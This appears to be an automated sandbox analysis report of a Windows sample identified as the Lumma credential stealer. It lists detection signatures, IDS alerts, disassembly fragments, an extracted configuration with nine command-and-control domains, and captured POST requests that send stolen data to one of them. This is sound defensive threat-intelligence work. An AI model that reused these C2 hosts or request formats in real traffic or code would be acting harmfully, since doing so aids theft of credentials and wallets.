Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1581552
MD5:	89c77bce077f8e9da11c4d6a6c496db1
SHA1:	43c62a61c90fb05dfdd19c871d9406b61e10d948
SHA256:	2f030fcc8d51309c46b8913109dbb5b6821d5b69da971962370d8470db1ad830
Tags:	exeuser-aachum
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains an invalid checksum

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Loader.exe (PID: 2612 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 89C77BCE077F8E9DA11C4D6A6C496DB1)

conhost.exe (PID: 4440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Loader.exe (PID: 5396 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: 89C77BCE077F8E9DA11C4D6A6C496DB1)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["screwamusresz.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "cureprouderio.click", "scentniej.buzz", "hummskitnj.buzz", "inherineau.buzz", "cashfuzysao.buzz"], "Build id": "LPnhqo--hubcpvkeaidz"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000003.2149819598.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2150289757.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.2171055409.0000000002C17000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 5396	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Loader.exe PID: 5396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Loader.exe PID: 5396	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 2 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T04:13:59.265947+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	172.67.132.7	443	TCP
2024-12-28T04:14:01.301951+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	172.67.132.7	443	TCP
2024-12-28T04:14:03.769915+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	172.67.132.7	443	TCP
2024-12-28T04:14:06.072098+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	172.67.132.7	443	TCP
2024-12-28T04:14:08.439165+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	172.67.132.7	443	TCP
2024-12-28T04:14:11.204433+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	172.67.132.7	443	TCP
2024-12-28T04:14:13.829357+0100	2028371	3	Unknown Traffic	192.168.2.5	49714	172.67.132.7	443	TCP
2024-12-28T04:14:17.467661+0100	2028371	3	Unknown Traffic	192.168.2.5	49718	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T04:14:00.028753+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	172.67.132.7	443	TCP
2024-12-28T04:14:02.110528+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49709	172.67.132.7	443	TCP
2024-12-28T04:14:18.223149+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49718	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T04:14:00.028753+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49708	172.67.132.7	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T04:14:02.110528+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49709	172.67.132.7	443	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T04:14:04.647437+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49710	172.67.132.7	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-28T04:14:13.833616+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49714	172.67.132.7	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["screwamusresz.buzz", "prisonyfork.buzz", "rebuildeso.buzz", "appliacnesot.buzz", "cureprouderio.click", "scentniej.buzz", "hummskitnj.buzz", "inherineau.buzz", "cashfuzysao.buzz"], "Build id": "LPnhqo--hubcpvkeaidz"}

Multi AV Scanner detection for submitted file

Source: Loader.exe

Virustotal: Detection: 40%

Perma Link

Machine Learning detection for sample

Source: Loader.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: hummskitnj.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cashfuzysao.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: appliacnesot.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: screwamusresz.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: inherineau.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: scentniej.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: rebuildeso.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: prisonyfork.buzz
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cureprouderio.click
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.2027723565.0000000004642000.00000004.00000020.00020000.00000000.sdmp	String decryptor: LPnhqo--hubcpvkeaidz

Source: C:\Users\user\Desktop\Loader.exe

Code function: 3_2_00417745 CryptUnprotectData,

3_2_00417745

Source: Loader.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.7:443 -> 192.168.2.5:49718 version: TLS 1.2

Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00A81FE9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 0_2_00A81F38 FindFirstFileExW,	0_2_00A81F38
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A81FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	3_2_00A81FE9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 3_2_00A81F38 FindFirstFileExW,	3_2_00A81F38

Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	3_2_0042D0CD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+eax]	3_2_0040D11B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edi, eax	3_2_0040D11B
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00409400
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+ecx-65h]	3_2_0043D4E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+00000278h]	3_2_00417745
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00440770
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4557D5DCh]	3_2_004387D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_00429070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then xor ebx, ebx	3_2_00429070
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, eax	3_2_004058D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebp, eax	3_2_004058D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 138629C0h	3_2_004158FC
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00416896
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]	3_2_0042C89E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042B8BD
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042B963
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx+04h]	3_2_0040D907
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h]	3_2_00440180
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 8AE4A158h	3_2_0041598C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 088030A7h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 11A82DE9h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 6E87DD67h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 798ECF08h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 11A82DE9h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00419190
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+06h]	3_2_0041B9A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5C093193h]	3_2_0041B25A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, ebx	3_2_00417A75
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00417207
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], cl	3_2_0042B215
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp ecx	3_2_0043F286
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+18h]	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [edx], cx	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx-2DCF3881h]	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_004142A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_00417AB8
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], ecx	3_2_0042BB60
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov dword ptr [esp], ecx	3_2_0042BB66
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	3_2_00402B70
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-00000098h]	3_2_00421B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+ecx+02h]	3_2_00421B00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0043DB10
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_0043D325
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4EB33D1Fh]	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+28h]	3_2_004163C0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then test eax, eax	3_2_004393D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then push eax	3_2_004393D0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	3_2_004073F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	3_2_004073F0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [esi], al	3_2_0041A3A0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h	3_2_0040B3BB
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebp+ecx-2Ch]	3_2_0043E450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h]	3_2_00440450
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, eax	3_2_00426430
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, dword ptr [esi+28h]	3_2_0040E49F
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov eax, dword ptr [0044A454h]	3_2_0040C4AE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042856C
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, dword ptr [00446180h]	3_2_00415506
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 120360DAh	3_2_00415506
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	3_2_00418DC5
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ebp+00h], al	3_2_0041D5B0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28h]	3_2_0041864E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00428630
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp cl, 0000002Eh	3_2_00426639
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov byte ptr [ecx], al	3_2_00426639
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]	3_2_0042963E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+28h]	3_2_00417EEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00417EEE
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_00429E80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov edx, ecx	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], C50B4B65h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], E0A81160h	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-098D4F7Eh]	3_2_00415E9A
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+edx]	3_2_0043CEA0
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00409EB9
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then mov ecx, eax	3_2_00418F52
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00435F00
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-1EB1B608h]	3_2_0042963E
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx edx, byte ptr [ebx+ecx]	3_2_0040AF23
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx]	3_2_0043F730
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	3_2_004167E1
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then jmp eax	3_2_00424F80
Source: C:\Users\user\Desktop\Loader.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebp-1EB1B624h]	3_2_004257AC

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49718 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49708 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49708 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49709 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49709 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49710 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49714 -> 172.67.132.7:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: screwamusresz.buzz
Source: Malware configuration extractor	URLs: prisonyfork.buzz
Source: Malware configuration extractor	URLs: rebuildeso.buzz
Source: Malware configuration extractor	URLs: appliacnesot.buzz
Source: Malware configuration extractor	URLs: cureprouderio.click
Source: Malware configuration extractor	URLs: scentniej.buzz
Source: Malware configuration extractor	URLs: hummskitnj.buzz
Source: Malware configuration extractor	URLs: inherineau.buzz
Source: Malware configuration extractor	URLs: cashfuzysao.buzz

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49714 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49711 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49718 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 172.67.132.7:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=5JQYYRU4ZWU28LYM79User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12842Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M7OTKUL40DGVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15048Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M8ZODEKLZRZCRAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20550Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=803Z290KWT6RJEV57User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1236Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=WZ2GIHF5D30ZJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585642Host: cureprouderio.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: cureprouderio.click

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: cureprouderio.click

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cureprouderio.click

Source: Loader.exe	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: Loader.exe, 00000003.00000003.2121067236.0000000005385000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
